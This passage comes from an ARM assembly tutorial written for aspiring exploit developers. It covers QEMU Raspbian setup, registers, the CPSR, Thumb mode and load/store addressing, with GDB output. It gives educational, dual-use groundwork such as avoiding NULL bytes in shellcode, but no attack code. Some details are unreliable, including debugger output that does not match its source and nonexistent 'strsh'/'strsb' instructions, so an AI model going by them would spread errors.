>Select B2 – Console Autologin

If your mouse doesn’t move in the emulated Pi, click <Windows>, arrow down to Accessories, arrow right, arrow down to Terminal, enter.

Resizing the Raspbian image

Once you are done with the setup, you are left with a total of 3,9GB on your image, which is full. To enlarge your Raspbian image, follow these steps on your Ubuntu machine:

Create a copy of your existing image:

$ cp <your-raspbian-jessie>.img rasbian.img

Run this command to resize your copy:

$ qemu-img resize raspbian.img +6G

Now start the original raspbian with enlarged image as second hard drive:

$ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/<your-original-raspbian-jessie>.img -redir tcp:5022::22 -no-reboot -hdb raspbian.img

Login and run:

$ sudo cfdisk /dev/sdb

Delete the second partition (sdb2) and create a New partition with all available space. Once new partition is creates, use Write to commit the changes. Then Quit the cfdisk.

Resize and check the old partition and shutdown.

$ sudo resize2fs /dev/sdb2
$ sudo fsck -f /dev/sdb2
$ sudo halt

Now you can start QEMU with your enlarged image:

$ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/raspbian.img -redir tcp:5022::22

Advanced Networking

In some cases you might want to access all the ports of the VM you are running in QEMU. For example, you run some binary which opens some network port(s) that you want to access/fuzz from your host (Ubuntu) system. For this purpose, we can create a shared network interface (tap0) which allows us to access all open ports (if those ports are not bound to 127.0.0.1). Thanks to @0xMitsurugi for suggesting this to include in this tutorial.

This can be done with the following commands on your HOST (Ubuntu) system:

azeria@labs:~ $ sudo apt-get install uml-utilities
azeria@labs:~ $ sudo tunctl -t tap0 -u azeria
azeria@labs:~ $ sudo ifconfig tap0 172.16.0.1/24

After these commands you should see the tap0 interface in the ifconfig output.

azeria@labs:~ $ ifconfig tap0
tap0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.16.0.1 netmask 255.255.255.0 broadcast 172.16.0.255
ether 22:a8:a9:d3:95:f1 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

You can now start your QEMU VM with this command:

azeria@labs:~ $ sudo qemu-system-arm -kernel ~/qemu_vms/<kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/rasbian.img -net nic -net tap,ifname=tap0,script=no,downscript=no -no-reboot

When the QEMU VM starts, you need to assign an IP to it’s eth0 interface with the following command:

pi@labs:~ $ sudo ifconfig eth0 172.16.0.2/24

If everything went well, you should be able to reach open ports on the GUEST (Raspbian) from your HOST (Ubuntu) system. You can test this with a netcat (nc) tool (see an example below).

ARM ASSEMBLY BASICS

Why ARM?

This tutorial is generally for people who want to learn the basics of ARM assembly. Especially for those of you who are interested in exploit writing on the ARM platform. You might have already noticed that ARM processors are everywhere around you. When I look around me, I can count far more devices that feature an ARM processor in my house than Intel processors. This includes phones, routers, and not to forget the IoT devices that seem to explode in sales these days. That said, the ARM processor has become one of the most widespread CPU cores in the world. Which brings us to the fact that like PCs, IoT devices are susceptible to improper input validation abuse such as buffer overflows. Given the widespread usage of ARM based devices and the potential for misuse, attacks on these devices have become much more common.

Yet, we have more experts specialized in x86 security research than we have for ARM, although ARM assembly language is perhaps the easiest assembly language in widespread use. So, why aren’t more people focusing on ARM? Perhaps because there are more learning resources out there covering exploitation on Intel than there are for ARM. Just think about the great tutorials on Intel x86 Exploit writing by Fuzzy Security or the Corelan Team – Guidelines like these help people interested in this specific area to get practical knowledge and the inspiration to learn beyond what is covered in those tutorials. If you are interested in x86 exploit writing, the Corelan and Fuzzysec tutorials are your perfect starting point. In this tutorial series here, we will focus on assembly basics and exploit writing on ARM.

ARM PROCESSOR VS. INTEL PROCESSOR

There are many differences between Intel and ARM, but the main difference is the instruction set. Intel is a CISC (Complex Instruction Set Computing) processor that has a larger and more feature-rich instruction set and allows many complex instructions to access memory. It therefore has more operations, addressing modes, but less registers than ARM. CISC processors are mainly used in normal PC’s, Workstations, and servers.

ARM is a RISC (Reduced instruction set Computing) processor and therefore has a simplified instruction set (100 instructions or less) and more general purpose registers than CISC. Unlike Intel, ARM uses instructions that operate only on registers and uses a Load/Store memory model for memory access, which means that only Load/Store instructions can access memory. This means that incrementing a 32-bit value at a particular memory address on ARM would require three types of instructions (load, increment and store) to first load the value at a particular address into a register, increment it within the register, and store it back to the memory from the register.

The reduced instruction set has its advantages and disadvantages. One of the advantages is that instructions can be executed more quickly, potentially allowing for greater speed (RISC systems shorten execution time by reducing the clock cycles per instruction). The downside is that less instructions means a greater emphasis on the efficient writing of software with the limited instructions that are available. Also important to note is that ARM has two modes, ARM mode and Thumb mode.

More differences between ARM and x86 are:

  • In ARM, most instructions can be used for conditional execution.
  • The Intel x86 and x86-64 series of processors use the little-endian format
  • The ARM architecture was little-endian before version 3. Since then ARM processors became BI-endian and feature a setting which allows for switchable endianness.

There are not only differences between Intel and ARM, but also between different ARM version themselves. This tutorial series is intended to keep it as generic as possible so that you get a general understanding about how ARM works. Once you understand the fundamentals, it’s easy to learn the nuances for your chosen target ARM version. The examples in this tutorial were created on an 32-bit ARMv6 (Raspberry Pi 1), therefore the explanations are related to this exact version.

The naming of the different ARM versions might also be confusing:

ARM family ARM architecture
ARM7 ARM v4
ARM9 ARM v5
ARM11 ARM v6
Cortex-A ARM v7-A
Cortex-R ARM v7-R
Cortex-M ARM v7-M
WRITING ASSEMBLY

Before we can start diving into ARM exploit development we first need to understand the basics of Assembly language programming, which requires a little background knowledge before you can start to appreciate it. But why do we even need ARM Assembly, isn’t it enough to write our exploits in a “normal” programming / scripting language? It is not, if we want to be able to do Reverse Engineering and understand the program flow of ARM binaries, build our own ARM shellcode, craft ARM ROP chains, and debug ARM applications.

You don’t need to know every little detail of the Assembly language to be able to do Reverse Engineering and exploit development, yet some of it is required for understanding the bigger picture. The fundamentals will be covered in this tutorial series. If you want to learn more you can visit the links listed at the end of this chapter.

So what exactly is Assembly language? Assembly language is just a thin syntax layer on top of the machine code which is composed of instructions, that are encoded in binary representations (machine code), which is what our computer understands. So why don’t we just write machine code instead? Well, that would be a pain in the ass. For this reason, we will write assembly, ARM assembly, which is much easier for humans to understand. Our computer can’t run assembly code itself, because it needs machine code. The tool we will use to assemble the assembly code into machine code is a GNU Assembler from the GNU Binutils project named as which works with source files having the *.s extension.

Once you wrote your assembly file with the extension *.s, you need to assemble it with as and link it with ld:

$ as program.s -o program.o
$ ld program.o -o program

ASSEMBLY UNDER THE HOOD

Let’s start at the very bottom and work our way up to the assembly language. At the lowest level, we have our electrical signals on our circuit. Signals are formed by switching the electrical voltage to one of two levels, say 0 volts (‘off’) or 5 volts (‘on’). Because just by looking we can’t easily tell what voltage the circuit is at, we choose to write patterns of on/off voltages using visual representations, the digits 0 and 1, to not only represent the idea of an absence or presence of a signal, but also because 0 and 1 are digits of the binary system. We then group the sequence of 0 and 1 to form a machine code instruction which is the smallest working unit of a computer processor. Here is an example of a machine language instruction:

1110 0001 1010 0000 0010 0000 0000 0001

So far so good, but we can’t remember what each of these patterns (of 0 and 1) mean.  For this reason, we use so called mnemonics, abbreviations to help us remember these binary patterns, where each machine code instruction is given a name. These mnemonics often consist of three letters, but this is not obligatory. We can write a program using these mnemonics as instructions. This program is called an Assembly language program, and the set of mnemonics that is used to represent a computer’s machine code is called the Assembly language of that computer. Therefore, Assembly language is the lowest level used by humans to program a computer. The operands of an instruction come after the mnemonic(s). Here is an example:

MOV R2, R1

Now that we know that an assembly program is made up of textual information called mnemonics, we need to get it converted into machine code. As mentioned above, in the case of ARM assembly, the GNU Binutils project supplies us with a tool called as. The process of using an assembler like as to convert from (ARM) assembly language to (ARM) machine code is called assembling.

In summary, we learned that computers understand (respond to) the presence or absence of voltages (signals) and that we can represent multiple signals in a sequence of 0s and 1s (bits). We can use machine code (sequences of signals) to cause the computer to respond in some well-defined way. Because we can’t remember what all these sequences mean, we give them abbreviations – mnemonics, and use them to represent instructions. This set of mnemonics is the Assembly language of the computer and we use a program called Assembler to convert code from mnemonic representation to the computer-readable machine code, in the same way a compiler does for high-level languages.

DATA TYPES

This is part two of the ARM Assembly Basics tutorial series, covering data types and registers.

Similar to high level languages, ARM supports operations on different datatypes.
The data types we can load (or store) can be signed and unsigned words, halfwords, or bytes. The extensions for these data types are: -h or -sh for halfwords, -b or -sb for bytes, and no extension for words. The difference between signed and unsigned data types is:

  • Signed data types can hold both positive and negative values and are therefore lower in range.
  • Unsigned data types can hold large positive values (including ‘Zero’) but cannot hold negative values and are therefore wider in range.

Here are some examples of how these data types can be used with the instructions Load and Store:

ldr = Load Word
ldrh = Load unsigned Half Word
ldrsh = Load signed Half Word
ldrb = Load unsigned Byte
ldrsb = Load signed Bytes

str = Store Word
strh = Store unsigned Half Word
strsh = Store signed Half Word
strb = Store unsigned Byte
strsb = Store signed Byte
ENDIANNESS

There are two basic ways of viewing bytes in memory: Little-Endian (LE) or Big-Endian (BE). The difference is the byte-order in which each byte of an object is stored in memory. On little-endian machines like Intel x86, the least-significant-byte is stored at the lowest address (the address closest to zero). On big-endian machines the most-significant-byte is stored at the lowest address. The ARM architecture was little-endian before version 3, since then it is bi-endian, which means that it features a setting which allows for switchable endianness. On ARMv6 for example, instructions are fixed little-endian and data accesses can be either little-endian or big-endian as controlled by bit 9, the E bit, of the Program Status Register (CPSR).

ARM REGISTERS

The amount of registers depends on the ARM version. According to the ARM Reference Manual, there are 30 general-purpose 32-bit registers, with the exception of ARMv6-M and ARMv7-M based processors. The first 16 registers are accessible in user-level mode, the additional registers are available in privileged software execution (with the exception of ARMv6-M and ARMv7-M). In this tutorial series we will work with the registers that are accessible in any privilege mode: r0-15. These 16 registers can be split into two groups: general purpose and special purpose registers.

The following table is just a quick glimpse into how the ARM registers could relate to those in Intel processors.

R0-R12: can be used during common operations to store temporary values, pointers (locations to memory), etc. R0, for example, can be referred as accumulator during the arithmetic operations or for storing the result of a previously called function. R7 becomes useful while working with syscalls as it stores the syscall number and R11 helps us to keep track of boundaries on the stack serving as the frame pointer (will be covered later). Moreover, the function calling convention on ARM specifies that the first four arguments of a function are stored in the registers r0-r3.

R13: SP (Stack Pointer). The Stack Pointer points to the top of the stack. The stack is an area of memory used for function-specific storage, which is reclaimed when the function returns. The stack pointer is therefore used for allocating space on the stack, by subtracting the value (in bytes) we want to allocate from the stack pointer. In other words, if we want to allocate a 32 bit value, we subtract 4 from the stack pointer.

R14: LR (Link Register). When a function call is made, the Link Register gets updated with a memory address referencing the next instruction where the function was initiated from. Doing this allows the program return to the “parent” function that initiated the “child” function call after the “child” function is finished.

R15: PC (Program Counter). The Program Counter is automatically incremented by the size of the instruction executed. This size is always 4 bytes in ARM state and 2 bytes in THUMB mode. When a branch instruction is being executed, the PC holds the destination address. During execution, PC stores the address of the current instruction plus 8 (two ARM instructions) in ARM state, and the current instruction plus 4 (two Thumb instructions) in Thumb(v1) state. This is different from x86 where PC always points to the next instruction to be executed.

Let’s look at how PC behaves in a debugger. We use the following program to store the address of pc into r0 and include two random instructions. Let’s see what happens.

.section .text
.global _start

_start:
 mov r0, pc
 mov r1, #2
 add r2, r1, r1
 bkpt

In GDB we set a breakpoint at _start and run it:

gef> br _start
Breakpoint 1 at 0x8054
gef> run

Here is a screenshot of the output we see first:

$r0 0x00000000   $r1 0x00000000   $r2 0x00000000   $r3 0x00000000 
$r4 0x00000000   $r5 0x00000000   $r6 0x00000000   $r7 0x00000000 
$r8 0x00000000   $r9 0x00000000   $r10 0x00000000  $r11 0x00000000 
$r12 0x00000000  $sp 0xbefff7e0   $lr 0x00000000   $pc 0x00008054 
$cpsr 0x00000010 

0x8054 <_start> mov r0, pc     <- $pc
0x8058 <_start+4> mov r0, #2
0x805c <_start+8> add r1, r0, r0
0x8060 <_start+12> bkpt 0x0000
0x8064 andeq r1, r0, r1, asr #10
0x8068 cmnvs r5, r0, lsl #2
0x806c tsteq r0, r2, ror #18
0x8070 andeq r0, r0, r11
0x8074 tsteq r8, r6, lsl #6

We can see that PC holds the address (0x8054) of the next instruction (mov r0, pc) that will be executed. Now let’s execute the next instruction after which R0 should hold the address of PC (0x8054), right?

$r0 0x0000805c   $r1 0x00000000   $r2 0x00000000   $r3 0x00000000 
$r4 0x00000000   $r5 0x00000000   $r6 0x00000000   $r7 0x00000000 
$r8 0x00000000   $r9 0x00000000   $r10 0x00000000  $r11 0x00000000 
$r12 0x00000000  $sp 0xbefff7e0   $lr 0x00000000   $pc 0x00008058 
$cpsr 0x00000010

0x8058 <_start+4> mov r0, #2       <- $pc
0x805c <_start+8> add r1, r0, r0
0x8060 <_start+12> bkpt 0x0000
0x8064 andeq r1, r0, r1, asr #10
0x8068 cmnvs r5, r0, lsl #2
0x806c tsteq r0, r2, ror #18
0x8070 andeq r0, r0, r11
0x8074 tsteq r8, r6, lsl #6
0x8078 adfcssp f0, f0, #4.0

…right? Wrong. Look at the address in R0. While we expected R0 to contain the previously read PC value (0x8054) it instead holds the value which is two instructions ahead of the PC we previously read (0x805c). From this example you can see that when we directly read PC it follows the definition that PC points to the next instruction; but when debugging, PC points two instructions ahead of the current PC value (0x8054 + 8 = 0x805C). This is because older ARM processors always fetched two instructions ahead of the currently executed instructions. The reason ARM retains this definition is to ensure compatibility with earlier processors.

CURRENT PROGRAM STATUS REGISTER

When you debug an ARM binary with gdb, you see something called Flags:

The register $cpsr shows the value of the Current Program Status Register (CPSR) and under that you can see the Flags thumb, fast, interrupt, overflow, carry, zero, and negative. These flags represent certain bits in the CPSR register and are set according to the value of the CPSR and turn bold when activated. The N, Z, C, and V bits are identical to the SF, ZF, CF, and OF bits in the EFLAG register on x86. These bits are used to support conditional execution in conditionals and loops at the assembly level. We will cover condition codes used in Conditional Execution and Branching.

The picture above shows a layout of a 32-bit register (CPSR) where the left (<-) side holds most-significant-bits and the right (->) side the least-significant-bits. Every single cell (except for the GE and M section along with the blank ones) are of a size of one bit. These one bit sections define various properties of the program’s current state.

Let’s assume we would use the CMP instruction to compare the numbers 1 and 2. The outcome would be ‘negative’ because 1 – 2 = -1. When we compare two equal numbers, like 2 against 2, the Z (zero) flag is set because 2 – 2 = 0. Keep in mind that the registers used with the CMP instruction won’t be modified, only the CPSR will be modified based on the result of comparing these registers against each other.

This is how it looks like in GDB (with GEF installed): In this example we compare the registers r1 and r0, where r1 = 4 and r0 = 2. This is how the flags look like after executing the cmp r1, r0 operation:

The Carry Flag is set because we use cmp r1, r0 to compare 4 against 2 (4 – 2). In contrast, the Negative flag (N) is set if we use cmp r0, r1 to compare a smaller number (2) against a bigger number (4).

Here’s an excerpt from the ARM infocenter:

The APSR contains the following ALU status flags:

N – Set when the result of the operation was Negative.

Z – Set when the result of the operation was Zero.

C – Set when the operation resulted in a Carry.

V – Set when the operation caused oVerflow.

A carry occurs:

  • if the result of an addition is greater than or equal to 232
  • if the result of a subtraction is positive or zero
  • as the result of an inline barrel shifter operation in a move or logical instruction.

Overflow occurs if the result of an add, subtract, or compare is greater than or equal to 231, or less than –231.

ARM & THUMB

ARM processors have two main states they can operate in (let’s not count Jazelle here), ARM and Thumb. These states have nothing to do with privilege levels. For example, code running in SVC mode can be either ARM or Thumb. The main difference between these two states is the instruction set, where instructions in ARM state are always 32-bit, and  instructions in Thumb state are 16-bit (but can be 32-bit). Knowing when and how to use Thumb is especially important for our ARM exploit development purposes. When writing ARM shellcode, we need to get rid of NULL bytes and using 16-bit Thumb instructions instead of 32-bit ARM instructions reduces the chance of having them.

The calling conventions of ARM versions is more than confusing and not all ARM versions support the same Thumb instruction sets. At some point, ARM introduced an enhanced Thumb instruction set (pseudo name: Thumbv2) which allows 32-bit Thumb instructions and even conditional execution, which was not possible in the versions prior to that. In order to use conditional execution in Thumb state, the “it” instruction was introduced. However, this instruction got then removed in a later version and exchanged with something that was supposed to make things less complicated, but achieved the opposite. I don’t know all the different variations of ARM/Thumb instruction sets across all the different ARM versions, and I honestly don’t care. Neither should you. The only thing that you need to know is the ARM version of your target device and its specific Thumb support so that you can adjust your code. The ARM Infocenter should help you figure out the specifics of your ARM version (http://infocenter.arm.com/help/index.jsp).

As mentioned before, there are different Thumb versions. The different naming is just for the sake of differentiating them from each other (the processor itself will always refer to it as Thumb).

  • Thumb-1 (16-bit instructions): was used in ARMv6 and earlier architectures.
  • Thumb-2 (16-bit and 32-bit instructions): extents Thumb-1 by adding more instructions and allowing them to be either 16-bit or 32-bit wide (ARMv6T2, ARMv7).
  • ThumbEE: includes some changes and additions aimed for dynamically generated code (code compiled on the device either shortly before or during execution).

Differences between ARM and Thumb:

  • Conditional execution: All instructions in ARM state support conditional execution. Some ARM processor versions allow conditional execution in Thumb by using the IT instruction. Conditional execution leads to higher code density because it reduces the number of instructions to be executed and reduces the number of expensive branch instructions.
  • 32-bit ARM and Thumb instructions: 32-bit Thumb instructions have a .w suffix.
  • The barrel shifter is another unique ARM mode feature. It can be used to shrink multiple instructions into one. For example, instead of using two instructions for a multiply (multiplying register by 2 and using MOV to store result into another register), you can include the multiply inside a MOV instruction by using shift left by 1 -> Mov  R1, R0, LSL #1      ; R1 = R0 * 2

To switch the state in which the processor executes in, one of two conditions have to be met:

  • We can use the branch instruction BX (branch and exchange) or BLX (branch, link, and exchange) and set the destination register’s least significant bit to 1. This can be achieved by adding 1 to an offset, like 0x5530 + 1. You might think that this would cause alignment issues, since instructions are either 2- or 4-byte aligned. This is not a problem because the processor will ignore the least significant bit.
  • We know that we are in Thumb mode if the T bit in the current program status register is set.
    • We know that we are in Thumb mode if the T bit in the current program status register is set.
    INTRODUCTION TO ARM INSTRUCTIONS

    The purpose of this part is to briefly introduce into the ARM’s instruction set and it’s general use. It is crucial for us to understand how the smallest piece of the Assembly language operates, how they connect to each other, and what can be achieved by combining them.

    As mentioned earlier, Assembly language is composed of instructions which are the main building blocks. ARM instructions are usually followed by one or two operands and generally use the following template:

    MNEMONIC{S}{condition} {Rd}, Operand1, Operand2

    Due to flexibility of the ARM instruction set, not all instructions use all of the fields provided in the template. Nevertheless, the purpose of fields in the template are described as follows:

    MNEMONIC     - Short name (mnemonic) of the instruction
    {S}          - An optional suffix. If S is specified, the condition flags are updated on the result of the operation
    {condition}  - Condition that is needed to be met in order for the instruction to be executed
    {Rd}         - Register (destination) for storing the result of the instruction
    Operand1     - First operand. Either a register or an immediate value 
    Operand2     - Second (flexible) operand. Can be an immediate value (number) or a register with an optional shift

    While the MNEMONIC, S, Rd and Operand1 fields are straight forward, the condition and Operand2 fields require a bit more clarification. The condition field is closely tied to the CPSR register’s value, or to be precise, values of specific bits within the register. Operand2 is called a flexible operand, because we can use it in various forms – as immediate value (with limited set of values), register or register with a shift. For example, we can use these expressions as the Operand2:

    #123                    - Immediate value (with limited set of values). 
    Rx                      - Register x (like R1, R2, R3 ...)
    Rx, ASR n               - Register x with arithmetic shift right by n bits (1 = n = 32)
    Rx, LSL n               - Register x with logical shift left by n bits (0 = n = 31)
    Rx, LSR n               - Register x with logical shift right by n bits (1 = n = 32)
    Rx, ROR n               - Register x with rotate right by n bits (1 = n = 31)
    Rx, RRX                 - Register x with rotate right by one bit, with extend

    As a quick example of how different kind of instructions look like, let’s take a look at the following list.

    ADD   R0, R1, R2         - Adds contents of R1 (Operand1) and R2 (Operand2 in a form of register) and stores the result into R0 (Rd)
    ADD   R0, R1, #2         - Adds contents of R1 (Operand1) and the value 2 (Operand2 in a form of an immediate value) and stores the result into R0 (Rd)
    MOVLE R0, #5             - Moves number 5 (Operand2, because the compiler treats it as MOVLE R0, R0, #5) to R0 (Rd) ONLY if the condition LE (Less Than or Equal) is satisfied
    MOV   R0, R1, LSL #1     - Moves the contents of R1 (Operand2 in a form of register with logical shift left) shifted left by one bit to R0 (Rd). So if R1 had value 2, it gets shifted left by one bit and becomes 4. 4 is then moved to R0.

    As a quick summary, let’s take a look at the most common instructions which we will use in future examples.

    MEMORY INSTRUCTIONS: LOAD AND STORE

    ARM uses a load-store model for memory access which means that only load/store (LDR and STR) instructions can access memory. While on x86 most instructions are allowed to directly operate on data in memory, on ARM data must be moved from memory into registers before being operated on. This means that incrementing a 32-bit value at a particular memory address on ARM would require three types of instructions (load, increment, and store) to first load the value at a particular address into a register, increment it within the register, and store it back to the memory from the register.

    To explain the fundamentals of Load and Store operations on ARM, we start with a basic example and continue with three basic offset forms with three different address modes for each offset form. For each example we will use the same piece of assembly code with a different LDR/STR offset form, to keep it simple.

    1. Offset form: Immediate value as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed
    2. Offset form: Register as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed
    3. Offset form: Scaled register as the offset
      • Addressing mode: Offset
      • Addressing mode: Pre-indexed
      • Addressing mode: Post-indexed

    First basic example

    Generally, LDR is used to load something from memory into a register, and STR is used to store something from a register to a memory address.

    LDR R2, [R0]   @ [R0] - origin address is the value found in R0.
    STR R2, [R1]   @ [R1] - destination address is the value found in R1.

    LDR operation: loads the value at the address found in R0 to the destination register R2.

    STR operation: stores the value found in R2 to the memory address found in R1.

     

    This is how it would look like in a functional assembly program:

    .data          /* the .data section is dynamically created and its addresses cannot be easily predicted */
    var1: .word 3  /* variable 1 in memory */
    var2: .word 4  /* variable 2 in memory */
    
    .text          /* start of the text (code) section */ 
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 into R0 
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 into R1 
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to register R2  
        str r2, [r1]      @ store the value found in R2 (0x03) to the memory address found in R1 
        bkpt             
    
    adr_var1: .word var1  /* address to var1 stored here */
    adr_var2: .word var2  /* address to var2 stored here */

    At the bottom we have our Literal Pool (a memory area in the same code section to store constants, strings, or offsets that others can reference in a position-independent manner) where we store the memory addresses of var1 and var2 (defined in the data section at the top) using the labels adr_var1 and adr_var2. The first LDR loads the address of var1 into register R0. The second LDR does the same for var2 and loads it to R1. Then we load the value stored at the memory address found in R0 to R2, and store the value found in R2 to the memory address found in R1.

    When we load something into a register, the brackets ([ ]) mean: the value found in the register between these brackets is a memory address we want to load something from.

    When we store something to a memory location, the brackets ([ ]) mean: the value found in the register between these brackets is a memory address we want to store something to.

    This sounds more complicated than it actually is, so here is a visual representation of what’s going on with the memory and the registers when executing the code above in a debugger:

    Let’s look at the same code in a debugger.

    gef> disassemble _start
    Dump of assembler code for function _start:
     0x00008074 <+0>:      ldr  r0, [pc, #12]   ; 0x8088 <adr_var1>
     0x00008078 <+4>:      ldr  r1, [pc, #12]   ; 0x808c <adr_var2>
     0x0000807c <+8>:      ldr  r2, [r0]
     0x00008080 <+12>:     str  r2, [r1]
     0x00008084 <+16>:     bx   lr
    End of assembler dump.

    The labels we specified with the first two LDR operations changed to [pc, #12]. This is called PC-relative addressing. Because we used labels, the compiler calculated the location of our values specified in the Literal Pool (PC+12).  You can either calculate the location yourself using this exact approach, or you can use labels like we did previously. The only difference is that instead of using labels, you need to count the exact position of your value in the Literal Pool. In this case, it is 3 hops (4+4+4=12) away from the effective PC position. More about PC-relative addressing later in this chapter.

    Side note: In case you forgot why the effective PC is located two instructions ahead of the current one, [… During execution, PC stores the address of the current instruction plus 8 (two ARM instructions) in ARM state, and the current instruction plus 4 (two Thumb instructions) in Thumb state. This is different from x86 where PC always points to the next instruction to be executed…].

    1. Offset form: Immediate value as the offset

    STR    Ra, [Rb, imm]
    LDR    Ra, [Rc, imm]

    Here we use an immediate (integer) as an offset. This value is added or subtracted from the base register (R1 in the example below) to access data at an offset known at compile time.

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 into R0
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 into R1
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to register R2 
        str r2, [r1, #2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 plus 2. Base register (R1) unmodified. 
        str r2, [r1, #4]! @ address mode: pre-indexed. Store the value found in R2 (0x03) to the memory address found in R1 plus 4. Base register (R1) modified: R1 = R1+4 
        ldr r3, [r1], #4  @ address mode: post-intexed. Load the value at memory address found in R1 to register R3 (not R3 plus 4). Base register (R1) modified: R1 = R1+4 
        bkpt
    
    adr_var1: .word var1
    adr_var2: .word var2

    Let’s call this program ldr.s, compile it and run it in GDB to see what happens.

    $ as ldr.s -o ldr.o
    $ ld ldr.o -o ldr
    $ gdb ldr

    In GDB (with gef) we set a break point at _start and run the program.

    gef> break _start
    gef> run
    ...
    gef> nexti 3     /* to run the next 3 instructions */

    The registers on my system are now filled with the following values (keep in mind that these addresses might be different on your system):

    $r0 : 0x00010098 -> 0x00000003
    $r1 : 0x0001009c -> 0x00000004
    $r2 : 0x00000003
    $r3 : 0x00000000
    $r4 : 0x00000000
    $r5 : 0x00000000
    $r6 : 0x00000000
    $r7 : 0x00000000
    $r8 : 0x00000000
    $r9 : 0x00000000
    $r10 : 0x00000000
    $r11 : 0x00000000
    $r12 : 0x00000000
    $sp : 0xbefff7e0 -> 0x00000001
    $lr : 0x00000000
    $pc : 0x00010080 -> <_start+12> str r2, [r1]
    $cpsr : 0x00000010

    The next instruction that will be executed a STR operation with the offset address mode. It will store the value from R2 (0x00000003) to the memory address specified in R1 (0x0001009c) + the offset (#2) = 0x1009e.

    gef> nexti
    gef> x/w 0x1009e 
    0x1009e <var2+2>: 0x3

    The next STR operation uses the pre-indexed address mode. You can recognize this mode by the exclamation mark (!). The only difference is that the base register will be updated with the final memory address in which the value of R2 will be stored. This means, we store the value found in R2 (0x3) to the memory address specified in R1 (0x1009c) + the offset (#4) = 0x100A0, and update R1 with this exact address.

    gef> nexti
    gef> x/w 0x100A0
    0x100a0: 0x3
    gef> info register r1
    r1     0x100a0     65696

    The last LDR operation uses the post-indexed address mode. This means that the base register (R1) is used as the final address, then updated with the offset calculated with R1+4. In other words, it takes the value found in R1 (not R1+4), which is 0x100A0 and loads it into R3, then updates R1 to R1 (0x100A0) + offset (#4) =  0x100a4.

    gef> info register r1
    r1      0x100a4   65700
    gef> info register r3
    r3      0x3       3

    Here is an abstract illustration of what’s happening:

    2. Offset form: Register as the offset.

    STR    Ra, [Rb, Rc]
    LDR    Ra, [Rb, Rc]

    This offset form uses a register as an offset. An example usage of this offset form is when your code wants to access an array where the index is computed at run-time.

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 to R0 
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 to R1 
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to R2
        str r2, [r1, r2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 (0x03). Base register unmodified.   
        str r2, [r1, r2]! @ address mode: pre-indexed. Store value found in R2 (0x03) to the memory address found in R1 with the offset R2 (0x03). Base register modified: R1 = R1+R2. 
        ldr r3, [r1], r2  @ address mode: post-indexed. Load value at memory address found in R1 to register R3. Then modify base register: R1 = R1+R2.
        bx lr
    
    adr_var1: .word var1
    adr_var2: .word var2

    After executing the first STR operation with the offset address mode, the value of R2 (0x00000003) will be stored at memory address 0x0001009c + 0x00000003 = 0x0001009F.

    gef> x/w 0x0001009F
     0x1009f <var2+3>: 0x00000003

    The second STR operation with the pre-indexed address mode will do the same, with the difference that it will update the base register (R1) with the calculated memory address (R1+R2).

    gef> info register r1
     r1     0x1009f      65695

    The last LDR operation uses the post-indexed address mode and loads the value at the memory address found in R1 into the register R2, then updates the base register R1 (R1+R2 = 0x1009f + 0x3 = 0x100a2).

    gef> info register r1
     r1      0x100a2     65698
    gef> info register r3
     r3      0x3       3

    3. Offset form: Scaled register as the offset

    LDR    Ra, [Rb, Rc, <shifter>]
    STR    Ra, [Rb, Rc, <shifter>]

    The third offset form has a scaled register as the offset. In this case, Rb is the base register and Rc is an immediate offset (or a register containing an immediate value) left/right shifted (<shifter>) to scale the immediate. This means that the barrel shifter is used to scale the offset. An example usage of this offset form would be for loops to iterate over an array. Here is a simple example you can run in GDB:

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1         @ load the memory address of var1 via label adr_var1 to R0
        ldr r1, adr_var2         @ load the memory address of var2 via label adr_var2 to R1
        ldr r2, [r0]             @ load the value (0x03) at memory address found in R0 to R2
        str r2, [r1, r2, LSL#2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 left-shifted by 2. Base register (R1) unmodified.
        str r2, [r1, r2, LSL#2]! @ address mode: pre-indexed. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 left-shifted by 2. Base register modified: R1 = R1 + R2<<2
        ldr r3, [r1], r2, LSL#2  @ address mode: post-indexed. Load value at memory address found in R1 to the register R3. Then modifiy base register: R1 = R1 + R2<<2
        bkpt
    
    adr_var1: .word var1
    adr_var2: .word var2

    The first STR operation uses the offset address mode and stores the value found in R2 at the memory location calculated from [r1, r2, LSL#2], which means that it takes the value in R1 as a base (in this case, R1 contains the memory address of var2), then it takes the value in R2 (0x3), and shifts it left by 2. The picture below is an attempt to visualize how the memory location is calculated with [r1, r2, LSL#2].

